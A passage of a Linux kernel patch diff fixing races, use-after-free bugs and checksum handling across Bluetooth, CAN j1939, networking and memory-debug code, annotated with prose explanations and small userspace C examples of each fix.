++	/*
++	 * The path pointer is verified as trusted and safe to use,
++	 * but let's double check it's valid anyway to work around
++	 * a potentially broken verifier.
++	 */
++	len = copy_from_kernel_nofault(&copy, path, sizeof(*path));
++	if (len < 0)
++		return len;
++
++	p = d_path(&copy, buf, sz);
+ 	if (IS_ERR(p)) {
+ 		len = PTR_ERR(p);
+ 	} else {
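copy_from_kernel_nofault() is the fault-tolerant kernel-to-kernel copy: it returns 0 on success and a negative errno (typically -EFAULT) instead of oopsing when the source address is bad, which is what makes it a safe way to validate a pointer before dereferencing it:

    struct path copy;
    long err;

    /* no page fault is taken even if 'path' is garbage */
    err = copy_from_kernel_nofault(&copy, path, sizeof(copy));
    if (err < 0)
        return err;     /* reject the bogus pointer */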
+diff --git a/lib/cpu_rmap.c b/lib/cpu_rmap.c
+index e77f12bb3c774..1833ad73de6fc 100644
+--- a/lib/cpu_rmap.c
++++ b/lib/cpu_rmap.c
+@@ -268,8 +268,8 @@ static void irq_cpu_rmap_release(struct kref *ref)
+ 	struct irq_glue *glue =
+ 		container_of(ref, struct irq_glue, notify.kref);
+ 
+-	cpu_rmap_put(glue->rmap);
+ 	glue->rmap->obj[glue->index] = NULL;
++	cpu_rmap_put(glue->rmap);
+ 	kfree(glue);
+ }
+ 
+diff --git a/mm/Kconfig.debug b/mm/Kconfig.debug
+index ce8dded36de94..32c2df12a5ec9 100644
+--- a/mm/Kconfig.debug
++++ b/mm/Kconfig.debug
+@@ -98,6 +98,7 @@ config PAGE_OWNER
+ config PAGE_TABLE_CHECK
+ 	bool "Check for invalid mappings in user page tables"
+ 	depends on ARCH_SUPPORTS_PAGE_TABLE_CHECK
++	depends on EXCLUSIVE_SYSTEM_RAM
+ 	select PAGE_EXTENSION
+ 	help
+ 	  Check that anonymous page is not being mapped twice with read write
+diff --git a/mm/page_table_check.c b/mm/page_table_check.c
+index 433dbce13fe1d..4d05065376213 100644
+--- a/mm/page_table_check.c
++++ b/mm/page_table_check.c
+@@ -69,6 +69,8 @@ static void page_table_check_clear(struct mm_struct *mm, unsigned long addr,
+ 
+ 	page = pfn_to_page(pfn);
+ 	page_ext = page_ext_get(page);
++
++	BUG_ON(PageSlab(page));
+ 	anon = PageAnon(page);
+ 
+ 	for (i = 0; i < pgcnt; i++) {
+@@ -105,6 +107,8 @@ static void page_table_check_set(struct mm_struct *mm, unsigned long addr,
+ 
+ 	page = pfn_to_page(pfn);
+ 	page_ext = page_ext_get(page);
++
++	BUG_ON(PageSlab(page));
+ 	anon = PageAnon(page);
+ 
+ 	for (i = 0; i < pgcnt; i++) {
+@@ -131,6 +135,8 @@ void __page_table_check_zero(struct page *page, unsigned int order)
+ 	struct page_ext *page_ext;
+ 	unsigned long i;
+ 
++	BUG_ON(PageSlab(page));
++
+ 	page_ext = page_ext_get(page);
+ 	BUG_ON(!page_ext);
+ 	for (i = 0; i < (1ul << order); i++) {
+diff --git a/net/batman-adv/distributed-arp-table.c b/net/batman-adv/distributed-arp-table.c
+index fefb51a5f6062..a0233252032dc 100644
+--- a/net/batman-adv/distributed-arp-table.c
++++ b/net/batman-adv/distributed-arp-table.c
+@@ -101,7 +101,6 @@ static void batadv_dat_purge(struct work_struct *work);
+  */
+ static void batadv_dat_start_timer(struct batadv_priv *bat_priv)
+ {
+-	INIT_DELAYED_WORK(&bat_priv->dat.work, batadv_dat_purge);
+ 	queue_delayed_work(batadv_event_workqueue, &bat_priv->dat.work,
+ 			   msecs_to_jiffies(10000));
+ }
+@@ -819,6 +818,7 @@ int batadv_dat_init(struct batadv_priv *bat_priv)
+ 	if (!bat_priv->dat.hash)
+ 		return -ENOMEM;
+ 
++	INIT_DELAYED_WORK(&bat_priv->dat.work, batadv_dat_purge);
+ 	batadv_dat_start_timer(bat_priv);
+ 
+ 	batadv_tvlv_handler_register(bat_priv, batadv_dat_tvlv_ogm_handler_v1,
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index c2c6dea01cc91..ab9f00252dc2a 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -966,6 +966,8 @@ static void cis_cleanup(struct hci_conn *conn)
+ 	/* Check if ISO connection is a CIS and remove CIG if there are
+ 	 * no other connections using it.
+ 	 */
++	hci_conn_hash_list_state(hdev, find_cis, ISO_LINK, BT_BOUND, &d);
++	hci_conn_hash_list_state(hdev, find_cis, ISO_LINK, BT_CONNECT, &d);
+ 	hci_conn_hash_list_state(hdev, find_cis, ISO_LINK, BT_CONNECTED, &d);
+ 	if (d.count)
+ 		return;
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index 334e308451f53..ca42129f8f91a 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -1416,10 +1416,10 @@ int hci_remove_link_key(struct hci_dev *hdev, bdaddr_t *bdaddr)
+ 
+ int hci_remove_ltk(struct hci_dev *hdev, bdaddr_t *bdaddr, u8 bdaddr_type)
+ {
+-	struct smp_ltk *k;
++	struct smp_ltk *k, *tmp;
+ 	int removed = 0;
+ 
+-	list_for_each_entry_rcu(k, &hdev->long_term_keys, list) {
++	list_for_each_entry_safe(k, tmp, &hdev->long_term_keys, list) {
+ 		if (bacmp(bdaddr, &k->bdaddr) || k->bdaddr_type != bdaddr_type)
+ 			continue;
+ 
+@@ -1435,9 +1435,9 @@ int hci_remove_ltk(struct hci_dev *hdev, bdaddr_t *bdaddr, u8 bdaddr_type)
+ 
+ void hci_remove_irk(struct hci_dev *hdev, bdaddr_t *bdaddr, u8 addr_type)
+ {
+-	struct smp_irk *k;
++	struct smp_irk *k, *tmp;
+ 
+-	list_for_each_entry_rcu(k, &hdev->identity_resolving_keys, list) {
++	list_for_each_entry_safe(k, tmp, &hdev->identity_resolving_keys, list) {
+ 		if (bacmp(bdaddr, &k->bdaddr) || k->addr_type != addr_type)
+ 			continue;
+ 
+@@ -2685,7 +2685,9 @@ void hci_unregister_dev(struct hci_dev *hdev)
+ {
+ 	BT_DBG("%p name %s bus %d", hdev, hdev->name, hdev->bus);
+ 
++	mutex_lock(&hdev->unregister_lock);
+ 	hci_dev_set_flag(hdev, HCI_UNREGISTER);
++	mutex_unlock(&hdev->unregister_lock);
+ 
+ 	write_lock(&hci_dev_list_lock);
+ 	list_del(&hdev->list);
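
Both hci_remove_ltk() and hci_remove_irk() above delete entries from the
list they are walking, so the plain iterator, which chases the current
node's next pointer after the loop body runs, is replaced with the _safe
variant that caches the successor up front. A minimal userspace analogue
of deleting while traversing, assuming a simple singly-linked list:

#include <stdio.h>
#include <stdlib.h>

struct node { int key; struct node *next; };

/* delete every matching node while walking the list; the successor is
 * taken before the node can be freed, which is the property the _safe
 * iterator's extra cursor provides in the kernel */
static void remove_key(struct node **pp, int key)
{
        struct node *n;

        while ((n = *pp) != NULL) {
                if (n->key == key) {
                        *pp = n->next;  /* unlink first ... */
                        free(n);        /* ... then free    */
                } else {
                        pp = &n->next;
                }
        }
}

int main(void)
{
        struct node *head = NULL, *n;
        int i;

        for (i = 0; i < 6; i++) {
                n = malloc(sizeof(*n));
                n->key = i % 2;
                n->next = head;
                head = n;
        }
        remove_key(&head, 1);
        for (n = head; n; n = n->next)
                printf("%d ", n->key);  /* prints: 0 0 0 */
        putchar('\n');
        remove_key(&head, 0);           /* empties the list */
        return 0;
}
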
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index e8b78104a4071..1805ddee0cd02 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -629,6 +629,7 @@ void hci_cmd_sync_init(struct hci_dev *hdev)
+ 	INIT_WORK(&hdev->cmd_sync_work, hci_cmd_sync_work);
+ 	INIT_LIST_HEAD(&hdev->cmd_sync_work_list);
+ 	mutex_init(&hdev->cmd_sync_work_lock);
++	mutex_init(&hdev->unregister_lock);
+ 
+ 	INIT_WORK(&hdev->cmd_sync_cancel_work, hci_cmd_sync_cancel_work);
+ 	INIT_WORK(&hdev->reenable_adv_work, reenable_adv);
+@@ -688,14 +689,19 @@ int hci_cmd_sync_queue(struct hci_dev *hdev, hci_cmd_sync_work_func_t func,
+ 		       void *data, hci_cmd_sync_work_destroy_t destroy)
+ {
+ 	struct hci_cmd_sync_work_entry *entry;
++	int err = 0;
+ 
+-	if (hci_dev_test_flag(hdev, HCI_UNREGISTER))
+-		return -ENODEV;
++	mutex_lock(&hdev->unregister_lock);
++	if (hci_dev_test_flag(hdev, HCI_UNREGISTER)) {
++		err = -ENODEV;
++		goto unlock;
++	}
+ 
+ 	entry = kmalloc(sizeof(*entry), GFP_KERNEL);
+-	if (!entry)
+-		return -ENOMEM;
+-
++	if (!entry) {
++		err = -ENOMEM;
++		goto unlock;
++	}
+ 	entry->func = func;
+ 	entry->data = data;
+ 	entry->destroy = destroy;
+@@ -706,7 +712,9 @@ int hci_cmd_sync_queue(struct hci_dev *hdev, hci_cmd_sync_work_func_t func,
+ 
+ 	queue_work(hdev->req_workqueue, &hdev->cmd_sync_work);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&hdev->unregister_lock);
++	return err;
+ }
+ EXPORT_SYMBOL(hci_cmd_sync_queue);
+ 
+@@ -4484,6 +4492,9 @@ static int hci_init_sync(struct hci_dev *hdev)
+ 	    !hci_dev_test_flag(hdev, HCI_CONFIG))
+ 		return 0;
+ 
++	if (hci_dev_test_and_set_flag(hdev, HCI_DEBUGFS_CREATED))
++		return 0;
++
+ 	hci_debugfs_create_common(hdev);
+ 
+ 	if (lmp_bredr_capable(hdev))
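
The hci_cmd_sync_queue() change above closes a classic test-then-act
race: the HCI_UNREGISTER flag is now tested under the same
hdev->unregister_lock that hci_unregister_dev() holds while setting it,
so no new work can slip onto the queue once unregistration has started.
A small pthread sketch of the pattern (all names illustrative):

#include <errno.h>
#include <pthread.h>
#include <stdbool.h>

static pthread_mutex_t unregister_lock = PTHREAD_MUTEX_INITIALIZER;
static bool unregistering;

/* the flag is tested under the same lock the setter holds, so queueing
 * cannot race with the start of unregistration */
static int queue_cmd(void (*fn)(void))
{
        int err = 0;

        pthread_mutex_lock(&unregister_lock);
        if (unregistering)
                err = -ENODEV;
        else
                fn();                   /* stand-in for queue_work() */
        pthread_mutex_unlock(&unregister_lock);
        return err;
}

static void unregister_dev(void)
{
        pthread_mutex_lock(&unregister_lock);
        unregistering = true;
        pthread_mutex_unlock(&unregister_lock);
}

static void work(void) { }

int main(void)
{
        queue_cmd(work);                                /* runs     */
        unregister_dev();
        return queue_cmd(work) == -ENODEV ? 0 : 1;      /* rejected */
}
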
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index ee8f806534dfb..02fc9961464cf 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -4307,6 +4307,10 @@ static int l2cap_connect_create_rsp(struct l2cap_conn *conn,
+ 	result = __le16_to_cpu(rsp->result);
+ 	status = __le16_to_cpu(rsp->status);
+ 
++	if (result == L2CAP_CR_SUCCESS && (dcid < L2CAP_CID_DYN_START ||
++					   dcid > L2CAP_CID_DYN_END))
++		return -EPROTO;
++
+ 	BT_DBG("dcid 0x%4.4x scid 0x%4.4x result 0x%2.2x status 0x%2.2x",
+ 	       dcid, scid, result, status);
+ 
+@@ -4338,6 +4342,11 @@ static int l2cap_connect_create_rsp(struct l2cap_conn *conn,
+ 
+ 	switch (result) {
+ 	case L2CAP_CR_SUCCESS:
++		if (__l2cap_get_chan_by_dcid(conn, dcid)) {
++			err = -EBADSLT;
++			break;
++		}
++
+ 		l2cap_state_change(chan, BT_CONFIG);
+ 		chan->ident = 0;
+ 		chan->dcid = dcid;
+@@ -4664,7 +4673,9 @@ static inline int l2cap_disconnect_req(struct l2cap_conn *conn,
+ 
+ 	chan->ops->set_shutdown(chan);
+ 
++	l2cap_chan_unlock(chan);
+ 	mutex_lock(&conn->chan_lock);
++	l2cap_chan_lock(chan);
+ 	l2cap_chan_del(chan, ECONNRESET);
+ 	mutex_unlock(&conn->chan_lock);
+ 
+@@ -4703,7 +4714,9 @@ static inline int l2cap_disconnect_rsp(struct l2cap_conn *conn,
+ 		return 0;
+ 	}
+ 
++	l2cap_chan_unlock(chan);
+ 	mutex_lock(&conn->chan_lock);
++	l2cap_chan_lock(chan);
+ 	l2cap_chan_del(chan, 0);
+ 	mutex_unlock(&conn->chan_lock);
+ 
+diff --git a/net/can/j1939/main.c b/net/can/j1939/main.c
+index 821d4ff303b35..ecff1c947d683 100644
+--- a/net/can/j1939/main.c
++++ b/net/can/j1939/main.c
+@@ -126,7 +126,7 @@ static void j1939_can_recv(struct sk_buff *iskb, void *data)
+ #define J1939_CAN_ID CAN_EFF_FLAG
+ #define J1939_CAN_MASK (CAN_EFF_FLAG | CAN_RTR_FLAG)
+ 
+-static DEFINE_SPINLOCK(j1939_netdev_lock);
++static DEFINE_MUTEX(j1939_netdev_lock);
+ 
+ static struct j1939_priv *j1939_priv_create(struct net_device *ndev)
+ {
+@@ -220,7 +220,7 @@ static void __j1939_rx_release(struct kref *kref)
+ 	j1939_can_rx_unregister(priv);
+ 	j1939_ecu_unmap_all(priv);
+ 	j1939_priv_set(priv->ndev, NULL);
+-	spin_unlock(&j1939_netdev_lock);
++	mutex_unlock(&j1939_netdev_lock);
+ }
+ 
+ /* get pointer to priv without increasing ref counter */
+@@ -248,9 +248,9 @@ static struct j1939_priv *j1939_priv_get_by_ndev(struct net_device *ndev)
+ {
+ 	struct j1939_priv *priv;
+ 
+-	spin_lock(&j1939_netdev_lock);
++	mutex_lock(&j1939_netdev_lock);
+ 	priv = j1939_priv_get_by_ndev_locked(ndev);
+-	spin_unlock(&j1939_netdev_lock);
++	mutex_unlock(&j1939_netdev_lock);
+ 
+ 	return priv;
+ }
+@@ -260,14 +260,14 @@ struct j1939_priv *j1939_netdev_start(struct net_device *ndev)
+ 	struct j1939_priv *priv, *priv_new;
+ 	int ret;
+ 
+-	spin_lock(&j1939_netdev_lock);
++	mutex_lock(&j1939_netdev_lock);
+ 	priv = j1939_priv_get_by_ndev_locked(ndev);
+ 	if (priv) {
+ 		kref_get(&priv->rx_kref);
+-		spin_unlock(&j1939_netdev_lock);
++		mutex_unlock(&j1939_netdev_lock);
+ 		return priv;
+ 	}
+-	spin_unlock(&j1939_netdev_lock);
++	mutex_unlock(&j1939_netdev_lock);
+ 
+ 	priv = j1939_priv_create(ndev);
+ 	if (!priv)
+@@ -277,29 +277,31 @@ struct j1939_priv *j1939_netdev_start(struct net_device *ndev)
+ 	spin_lock_init(&priv->j1939_socks_lock);
+ 	INIT_LIST_HEAD(&priv->j1939_socks);
+ 
+-	spin_lock(&j1939_netdev_lock);
++	mutex_lock(&j1939_netdev_lock);
+ 	priv_new = j1939_priv_get_by_ndev_locked(ndev);
+ 	if (priv_new) {
+ 		/* Someone was faster than us, use their priv and roll
+ 		 * back ours.
+ 		 */
+ 		kref_get(&priv_new->rx_kref);
+-		spin_unlock(&j1939_netdev_lock);
++		mutex_unlock(&j1939_netdev_lock);
+ 		dev_put(ndev);
+ 		kfree(priv);
+ 		return priv_new;
+ 	}
+ 	j1939_priv_set(ndev, priv);
+-	spin_unlock(&j1939_netdev_lock);
+ 
+ 	ret = j1939_can_rx_register(priv);
+ 	if (ret < 0)
+ 		goto out_priv_put;
+ 
++	mutex_unlock(&j1939_netdev_lock);
+ 	return priv;
+ 
+  out_priv_put:
+ 	j1939_priv_set(ndev, NULL);
++	mutex_unlock(&j1939_netdev_lock);
++
+ 	dev_put(ndev);
+ 	kfree(priv);
+ 
+@@ -308,7 +310,7 @@ struct j1939_priv *j1939_netdev_start(struct net_device *ndev)
+ 
+ void j1939_netdev_stop(struct j1939_priv *priv)
+ {
+-	kref_put_lock(&priv->rx_kref, __j1939_rx_release, &j1939_netdev_lock);
++	kref_put_mutex(&priv->rx_kref, __j1939_rx_release, &j1939_netdev_lock);
+ 	j1939_priv_put(priv);
+ }
+ 
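
j1939_netdev_lock changes from a spinlock to a mutex because the
sections it now covers, including j1939_can_rx_register(), may sleep,
and teardown switches to kref_put_mutex(), which takes the lock only
when the count is about to hit zero so that the release function runs
with the registry locked and lookups cannot revive a dying object. A
simplified userspace analogue of kref_put_mutex() using C11 atomics
(types and names illustrative):

#include <pthread.h>
#include <stdatomic.h>
#include <stdlib.h>

struct obj {
        atomic_int refs;
        void (*release)(struct obj *);
};

/* like kref_put_mutex(): lock only when this put may be the last one */
static void put_mutex(struct obj *o, pthread_mutex_t *lock)
{
        int v = atomic_load(&o->refs);

        while (v > 1)           /* fast path: cannot be the last ref */
                if (atomic_compare_exchange_weak(&o->refs, &v, v - 1))
                        return;

        pthread_mutex_lock(lock);
        if (atomic_fetch_sub(&o->refs, 1) == 1)
                o->release(o);  /* object dies under the lock */
        pthread_mutex_unlock(lock);
}

static void obj_free(struct obj *o) { free(o); }
static pthread_mutex_t registry_lock = PTHREAD_MUTEX_INITIALIZER;

int main(void)
{
        struct obj *o = malloc(sizeof(*o));

        atomic_init(&o->refs, 2);
        o->release = obj_free;
        put_mutex(o, &registry_lock);   /* fast path, refs 2 -> 1 */
        put_mutex(o, &registry_lock);   /* slow path, frees o     */
        return 0;
}
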
+diff --git a/net/can/j1939/socket.c b/net/can/j1939/socket.c
+index 4fb3a99b5f67e..9c828067b4481 100644
+--- a/net/can/j1939/socket.c
++++ b/net/can/j1939/socket.c
+@@ -1088,6 +1088,11 @@ void j1939_sk_errqueue(struct j1939_session *session,
+ 
+ void j1939_sk_send_loop_abort(struct sock *sk, int err)
+ {
++	struct j1939_sock *jsk = j1939_sk(sk);
++
++	if (jsk->state & J1939_SOCK_ERRQUEUE)
++		return;
++
+ 	sk->sk_err = err;
+ 
+ 	sk_error_report(sk);
+diff --git a/net/core/dev.c b/net/core/dev.c
+index 93d430693ca0f..a2e3c6470ab3f 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -4483,8 +4483,10 @@ static int get_rps_cpu(struct net_device *dev, struct sk_buff *skb,
+ 		u32 next_cpu;
+ 		u32 ident;
+ 
+-		/* First check into global flow table if there is a match */
+-		ident = sock_flow_table->ents[hash & sock_flow_table->mask];
++		/* First check into global flow table if there is a match.
++		 * This READ_ONCE() pairs with WRITE_ONCE() from rps_record_sock_flow().
++		 */
++		ident = READ_ONCE(sock_flow_table->ents[hash & sock_flow_table->mask]);
+ 		if ((ident ^ hash) & ~rps_cpu_mask)
+ 			goto try_rps;
+ 
+@@ -10516,7 +10518,7 @@ struct netdev_queue *dev_ingress_queue_create(struct net_device *dev)
+ 		return NULL;
+ 	netdev_init_one_queue(dev, queue, NULL);
+ 	RCU_INIT_POINTER(queue->qdisc, &noop_qdisc);
+-	queue->qdisc_sleeping = &noop_qdisc;
++	RCU_INIT_POINTER(queue->qdisc_sleeping, &noop_qdisc);
+ 	rcu_assign_pointer(dev->ingress_queue, queue);
+ #endif
+ 	return queue;
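
As the new comment in get_rps_cpu() says, the flow-table entry is
updated by rps_record_sock_flow() without any lock the reader holds, so
both sides must be marked: READ_ONCE() on the read pairs with
WRITE_ONCE() on the write, forbidding the compiler from tearing, fusing,
or re-loading the value. A userspace stand-in using C11 relaxed atomics;
the ident encoding below is illustrative only:

#include <stdatomic.h>
#include <stdint.h>
#include <stdio.h>

#define TABLE_SIZE 256
static _Atomic uint32_t ents[TABLE_SIZE];

/* writer side, analogous to WRITE_ONCE(table->ents[i], val) */
static void record_flow(uint32_t hash, uint32_t cpu)
{
        atomic_store_explicit(&ents[hash % TABLE_SIZE],
                              (hash & ~0xffu) | (cpu & 0xffu),
                              memory_order_relaxed);
}

/* reader side, analogous to READ_ONCE(table->ents[i]) */
static uint32_t lookup_flow(uint32_t hash)
{
        return atomic_load_explicit(&ents[hash % TABLE_SIZE],
                                    memory_order_relaxed);
}

int main(void)
{
        record_flow(0x12345678u, 3);
        printf("cpu %u\n", (unsigned)(lookup_flow(0x12345678u) & 0xffu));
        return 0;
}
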
+diff --git a/net/core/skmsg.c b/net/core/skmsg.c
+index 9e0f694515636..65fb6f5b21b28 100644
+--- a/net/core/skmsg.c
++++ b/net/core/skmsg.c
+@@ -1205,7 +1205,8 @@ static void sk_psock_verdict_data_ready(struct sock *sk)
+ 
+ 		rcu_read_lock();
+ 		psock = sk_psock(sk);
+-		psock->saved_data_ready(sk);
++		if (psock)
++			psock->saved_data_ready(sk);
+ 		rcu_read_unlock();
+ 	}
+ }
+diff --git a/net/ipv4/sysctl_net_ipv4.c b/net/ipv4/sysctl_net_ipv4.c
+index 39dbeb6071965..f68762ce4d8a3 100644
+--- a/net/ipv4/sysctl_net_ipv4.c
++++ b/net/ipv4/sysctl_net_ipv4.c
+@@ -34,8 +34,8 @@ static int ip_ttl_min = 1;
+ static int ip_ttl_max = 255;
+ static int tcp_syn_retries_min = 1;
+ static int tcp_syn_retries_max = MAX_TCP_SYNCNT;
+-static int ip_ping_group_range_min[] = { 0, 0 };
+-static int ip_ping_group_range_max[] = { GID_T_MAX, GID_T_MAX };
++static unsigned long ip_ping_group_range_min[] = { 0, 0 };
++static unsigned long ip_ping_group_range_max[] = { GID_T_MAX, GID_T_MAX };
+ static u32 u32_max_div_HZ = UINT_MAX / HZ;
+ static int one_day_secs = 24 * 3600;
+ static u32 fib_multipath_hash_fields_all_mask __maybe_unused =
+@@ -162,7 +162,7 @@ static int ipv4_ping_group_range(struct ctl_table *table, int write,
+ {
+ 	struct user_namespace *user_ns = current_user_ns();
+ 	int ret;
+-	gid_t urange[2];
++	unsigned long urange[2];
+ 	kgid_t low, high;
+ 	struct ctl_table tmp = {
+ 		.data = &urange,
+@@ -175,7 +175,7 @@ static int ipv4_ping_group_range(struct ctl_table *table, int write,
+ 	inet_get_ping_group_range_table(table, &low, &high);
+ 	urange[0] = from_kgid_munged(user_ns, low);
+ 	urange[1] = from_kgid_munged(user_ns, high);
+-	ret = proc_dointvec_minmax(&tmp, write, buffer, lenp, ppos);
++	ret = proc_doulongvec_minmax(&tmp, write, buffer, lenp, ppos);
+ 
+ 	if (write && ret == 0) {
+ 		low = make_kgid(user_ns, urange[0]);
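
The ping_group_range switch to unsigned long matters because GID_T_MAX
is 4294967295, which is not representable in a signed int, so an
int-based proc_dointvec_minmax() could never accept the documented upper
bound. A two-line demonstration of the representability problem:

#include <stdio.h>

int main(void)
{
        unsigned long gid_t_max = 4294967295UL; /* GID_T_MAX */
        int as_int = (int)gid_t_max;            /* implementation-defined:
                                                 * -1 on the usual two's
                                                 * complement ABIs */

        printf("unsigned long: %lu, as int: %d\n", gid_t_max, as_int);
        return 0;
}
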
+diff --git a/net/ipv4/tcp_offload.c b/net/ipv4/tcp_offload.c
+index 45dda78893870..4851211aa60d6 100644
+--- a/net/ipv4/tcp_offload.c
++++ b/net/ipv4/tcp_offload.c
+@@ -60,12 +60,12 @@ struct sk_buff *tcp_gso_segment(struct sk_buff *skb,
+ 	struct tcphdr *th;
+ 	unsigned int thlen;
+ 	unsigned int seq;
+-	__be32 delta;
+ 	unsigned int oldlen;
+ 	unsigned int mss;
+ 	struct sk_buff *gso_skb = skb;
+ 	__sum16 newcheck;
+ 	bool ooo_okay, copy_destructor;
++	__wsum delta;
+ 
+ 	th = tcp_hdr(skb);
+ 	thlen = th->doff * 4;
+@@ -75,7 +75,7 @@ struct sk_buff *tcp_gso_segment(struct sk_buff *skb,
+ 	if (!pskb_may_pull(skb, thlen))
+ 		goto out;
+ 
+-	oldlen = (u16)~skb->len;
++	oldlen = ~skb->len;
+ 	__skb_pull(skb, thlen);
+ 
+ 	mss = skb_shinfo(skb)->gso_size;
+@@ -110,7 +110,7 @@ struct sk_buff *tcp_gso_segment(struct sk_buff *skb,
+ 	if (skb_is_gso(segs))
+ 		mss *= skb_shinfo(segs)->gso_segs;
+ 
+-	delta = htonl(oldlen + (thlen + mss));
++	delta = (__force __wsum)htonl(oldlen + thlen + mss);
+ 
+ 	skb = segs;
+ 	th = tcp_hdr(skb);
+@@ -119,8 +119,7 @@ struct sk_buff *tcp_gso_segment(struct sk_buff *skb,
+ 	if (unlikely(skb_shinfo(gso_skb)->tx_flags & SKBTX_SW_TSTAMP))
+ 		tcp_gso_tstamp(segs, skb_shinfo(gso_skb)->tskey, seq, mss);
+ 
+-	newcheck = ~csum_fold((__force __wsum)((__force u32)th->check +
+-					       (__force u32)delta));
++	newcheck = ~csum_fold(csum_add(csum_unfold(th->check), delta));
+ 
+ 	while (skb->next) {
+ 		th->fin = th->psh = 0;
+@@ -165,11 +164,11 @@ struct sk_buff *tcp_gso_segment(struct sk_buff *skb,
+ 			WARN_ON_ONCE(refcount_sub_and_test(-delta, &skb->sk->sk_wmem_alloc));
+ 	}
+ 
+-	delta = htonl(oldlen + (skb_tail_pointer(skb) -
+-				skb_transport_header(skb)) +
+-		      skb->data_len);
+-	th->check = ~csum_fold((__force __wsum)((__force u32)th->check +
+-				(__force u32)delta));
++	delta = (__force __wsum)htonl(oldlen +
++				      (skb_tail_pointer(skb) -
++				       skb_transport_header(skb)) +
++				      skb->data_len);
++	th->check = ~csum_fold(csum_add(csum_unfold(th->check), delta));
+ 	if (skb->ip_summed == CHECKSUM_PARTIAL)
+ 		gso_reset_checksum(skb, ~th->check);
+ 	else
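
The tcp_gso_segment() rework keeps the checksum delta in __wsum and
folds it with csum_add()/csum_fold() rather than truncating oldlen
through a u16 cast, which loses high bits for large GSO packets. The
arithmetic is the standard incremental ones'-complement update (RFC
1624: check' = ~(~check + ~m + m')). A self-contained userspace version
that verifies the incremental result against a full recomputation; the
header words are made-up constants:

#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

static uint32_t csum_add(uint32_t a, uint32_t b)
{
        a += b;
        return a + (a < b);     /* 32-bit end-around carry */
}

static uint16_t csum_fold(uint32_t sum)
{
        sum = (sum & 0xffff) + (sum >> 16);
        sum = (sum & 0xffff) + (sum >> 16);
        return (uint16_t)~sum;
}

static uint16_t checksum(const uint16_t *p, size_t words)
{
        uint32_t sum = 0;

        while (words--)
                sum = csum_add(sum, *p++);
        return csum_fold(sum);
}

int main(void)
{
        uint16_t hdr[4] = { 0x4500, 0x0054, 0xabcd, 0x0000 };
        uint16_t oldw = hdr[1], neww = 0x05dc;
        uint16_t check, incr;

        check = checksum(hdr, 4);       /* full checksum */

        /* incremental update: check' = ~(~check + ~m + m') */
        incr = csum_fold(csum_add(csum_add((uint16_t)~check,
                                           (uint16_t)~oldw), neww));
        hdr[1] = neww;
        printf("incremental 0x%04x == full 0x%04x\n",
               incr, checksum(hdr, 4));
        return 0;
}

For these constants both paths print 0x0956.
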
+diff --git a/net/ipv6/exthdrs.c b/net/ipv6/exthdrs.c
+index a8d961d3a477f..5fa0e37305d9d 100644
+--- a/net/ipv6/exthdrs.c
++++ b/net/ipv6/exthdrs.c
+@@ -569,24 +569,6 @@ looped_back:
+ 		return -1;
+ 	}
+ 
+-	if (skb_cloned(skb)) {
+-		if (pskb_expand_head(skb, IPV6_RPL_SRH_WORST_SWAP_SIZE, 0,
+-				     GFP_ATOMIC)) {
+-			__IP6_INC_STATS(net, ip6_dst_idev(skb_dst(skb)),
+-					IPSTATS_MIB_OUTDISCARDS);
+-			kfree_skb(skb);
+-			return -1;
+-		}
+-	} else {
+-		err = skb_cow_head(skb, IPV6_RPL_SRH_WORST_SWAP_SIZE);
+-		if (unlikely(err)) {
+-			kfree_skb(skb);
+-			return -1;
+-		}
+-	}
+-
+-	hdr = (struct ipv6_rpl_sr_hdr *)skb_transport_header(skb);
+-
+ 	if (!pskb_may_pull(skb, ipv6_rpl_srh_size(n, hdr->cmpri,
+ 						  hdr->cmpre))) {
+ 		kfree_skb(skb);
+@@ -630,6 +612,17 @@ looped_back:
+ 	skb_pull(skb, ((hdr->hdrlen + 1) << 3));
+ 	skb_postpull_rcsum(skb, oldhdr,
+ 			   sizeof(struct ipv6hdr) + ((hdr->hdrlen + 1) << 3));
++	if (unlikely(!hdr->segments_left)) {
++		if (pskb_expand_head(skb, sizeof(struct ipv6hdr) + ((chdr->hdrlen + 1) << 3), 0,
++				     GFP_ATOMIC)) {
++			__IP6_INC_STATS(net, ip6_dst_idev(skb_dst(skb)), IPSTATS_MIB_OUTDISCARDS);
++			kfree_skb(skb);
++			kfree(buf);
++			return -1;
++		}
++
++		oldhdr = ipv6_hdr(skb);
++	}
+ 	skb_push(skb, ((chdr->hdrlen + 1) << 3) + sizeof(struct ipv6hdr));
+ 	skb_reset_network_header(skb);
+ 	skb_mac_header_rebuild(skb);
+diff --git a/net/mac80211/he.c b/net/mac80211/he.c
+index 729f261520c77..0322abae08250 100644
+--- a/net/mac80211/he.c
++++ b/net/mac80211/he.c
+@@ -3,7 +3,7 @@
+  * HE handling
+  *
+  * Copyright(c) 2017 Intel Deutschland GmbH
+- * Copyright(c) 2019 - 2022 Intel Corporation
++ * Copyright(c) 2019 - 2023 Intel Corporation
+  */
+ 
+ #include "ieee80211_i.h"
+@@ -114,6 +114,7 @@ ieee80211_he_cap_ie_to_sta_he_cap(struct ieee80211_sub_if_data *sdata,
+ 				  struct link_sta_info *link_sta)
+ {
+ 	struct ieee80211_sta_he_cap *he_cap = &link_sta->pub->he_cap;
++	const struct ieee80211_sta_he_cap *own_he_cap_ptr;
+ 	struct ieee80211_sta_he_cap own_he_cap;
+ 	struct ieee80211_he_cap_elem *he_cap_ie_elem = (void *)he_cap_ie;
+ 	u8 he_ppe_size;
+@@ -123,12 +124,16 @@ ieee80211_he_cap_ie_to_sta_he_cap(struct ieee80211_sub_if_data *sdata,
+ 
+ 	memset(he_cap, 0, sizeof(*he_cap));
+ 
+-	if (!he_cap_ie ||
+-	    !ieee80211_get_he_iftype_cap(sband,
+-					 ieee80211_vif_type_p2p(&sdata->vif)))
